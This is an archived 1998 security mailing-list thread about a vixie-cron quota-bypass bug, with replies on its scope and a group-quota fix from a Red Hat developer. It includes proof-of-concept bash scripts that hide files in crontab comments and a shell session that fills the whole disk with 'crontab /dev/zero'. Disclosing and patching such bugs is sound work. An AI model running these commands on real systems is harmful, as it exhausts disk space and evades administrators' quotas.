[ http://www.rootshell.com/ ] The problem with vixie cron is wider (and more funny) than I expected. Here's my proggy which allows hiding files of any kind and size into crontab entries (remember, quota is ignored ;-): -- cron_put -- #!/bin/bash echo "Vixie cron 3.0.1 file storage - put utlility" echo "by Michal Zalewski " echo if [ "$1" = "" ]; then echo usage: $0 file_to_hide echo exit 0 fi if [ ! "`ulimit`" = "unlimited" ]; then echo Warning, filesize limit is set to `ulimit`. echo fi echo Installing fake crontab... echo echo "* * * * * # whoops..." >vix_tmp uuencode $1 <$1 | awk -F "\n" '{print "#FAKE" $1}' >>vix_tmp crontab vix_tmp echo "Thank you, file stored successfully." -- eof -- The next program allows futher extraction of these files: -- cron_get -- #!/bin/bash echo "Vixie cron 3.0.1 file storage - get utility" echo "by Michal Zalewski " echo if [ ! "`ulimit`" = "unlimited" ]; then echo Warning, filesize limit is set to `ulimit`. echo fi crontab -l | grep "#FAKE" | awk -F "#FAKE" '{print $2}'|uudecode echo "File restored successfully." -- eof -- _______________________________________________________________________ Micha³ Zalewski [lcamtuf@boss.staszic.waw.pl] ---------------------------------------------------------------------------- > The problem with vixie cron is wider (and more funny) than I expected. > Here's my proggy which allows hiding files of any kind and size into > crontab entries (remember, quota is ignored ;-): This is not a vixie-cron specific problem. Comments can be stored in all cron's I have come across. grant. ---------------------------------------------------------------------------- On Fri, 6 Feb 1998, Grant Beattie wrote: | > crontab entries (remember, quota is ignored ;-): | | This is not a vixie-cron specific problem. Comments can be stored in all | cron's I have come across. the problem is in the _quota_ skipping bug. Just tried it on my dillon's crond on linux. it aborted with quota exceeded. --- M S Anam ---------------------------------------------------------------------------- Whoops, I made a mistake in previous post ;P It isn't extremally important, but may cause misunderstandig. Here's fixed version: Suid executable, /usr/bin/crontab (vixie-cron up to 3.0.1-20), every time it is called by user, transfers content of given file to root-owned temporary file created in /var/spool/cron. Then, when coopying is done, crontab renames it to user's login name. But when copied file is larger than max. filesize limit (it may be modified using 'ulimit' command) or available disk space, crontab dies leaving this temporary file. In this case user may store anything 'behind' quota limits, or waste whole free disk space. Here's an example: At the beginning, some useless info ;) [root@genome /]# rpm -q vixie-cron vixie-cron-3.0.1-20 [root@genome /]# ls -l /var/spool/cron total 1 -rw------- 1 root root 769 Nov 27 20:21 root [root@genome /]# df Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda3 199079 166164 22634 88% / ... Looks good. Now, the main attack: [lcamtuf@genome lcamtuf]$ ulimit 5000 [lcamtuf@genome lcamtuf]$ quota Disk quotas for user lcamtuf (uid 513): Filesystem blocks quota limit grace files quota limit grace /dev/hda3 3 5000 5000 15 150 150 ... [lcamtuf@genome lcamtuf]$ NIC=0 [lcamtuf@genome lcamtuf]$ while [ $NIC -lt 5 ]; do crontab /dev/zero & let NIC=NIC+1;done [1] 399 [2] 400 [3] 401 [4] 402 [5] 403 [lcamtuf@genome lcamtuf]$ sleep 300;killall -9 crontab [1] Killed crontab /dev/zero [2] Killed crontab /dev/zero [3] Killed crontab /dev/zero [4] Killed crontab /dev/zero [5] Killed crontab /dev/zero [lcamtuf@genome lcamtuf]$ quota Disk quotas for user lcamtuf (uid 513): Filesystem blocks quota limit grace files quota limit grace /dev/hda3 3 5000 5000 13 150 150 Nothing happend...? Not quite: [root@genome /]# df Filesystem 1024-blocks Used Available Capacity Mounted on /dev/hda3 199079 191290 0 100% / ... Whoops... What's going on? [root@genome /]# ls -l /var/spool/cron total 25106 -rw------- 1 root root 769 Nov 27 20:21 root -rw------- 1 root lcamtuf 5120000 Feb 5 15:01 tmp.453 -rw------- 1 root lcamtuf 5120000 Feb 5 15:02 tmp.468 -rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.469 -rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.482 -rw------- 1 root lcamtuf 5120000 Feb 5 15:03 tmp.483 Note - when ulimit is 0, user may waste WHOLE DISK SPACE using single crontab /dev/zero command!!! Not funny, not funny, not funny... Attack described above is stupid and simple, but /dev/zero may be replaced eg. with pipe. In this case, these well-hidden 'temporary' files may be used to store large amounts of hidden data, far away of user's home directory or tmp dirs. _______________________________________________________________________ Micha³ Zalewski [lcamtuf@boss.staszic.waw.pl] ---------------------------------------------------------------------------- On Thu, 5 Feb 1998, Micha³ Zalewski wrote: > The problem with vixie cron is wider (and more funny) than I expected. > Here's my proggy which allows hiding files of any kind and size into > crontab entries (remember, quota is ignored ;-): This problem can be easily corrected, at least on Red Hat Linux systems, were every user have it's own group. vixie cron will install the crontab file with ownership root.usergroup. Installing group quotas for the partiotion /var/spool/cron resides on will solve the problem. I don't know about other linux systems, but at least on Red Hat the user-hroup scheme is proving to be useful in this case :-) Best wishes, Cristian -- Cristian Gafton gafton@redhat.com ----------------------------------------------------------------------------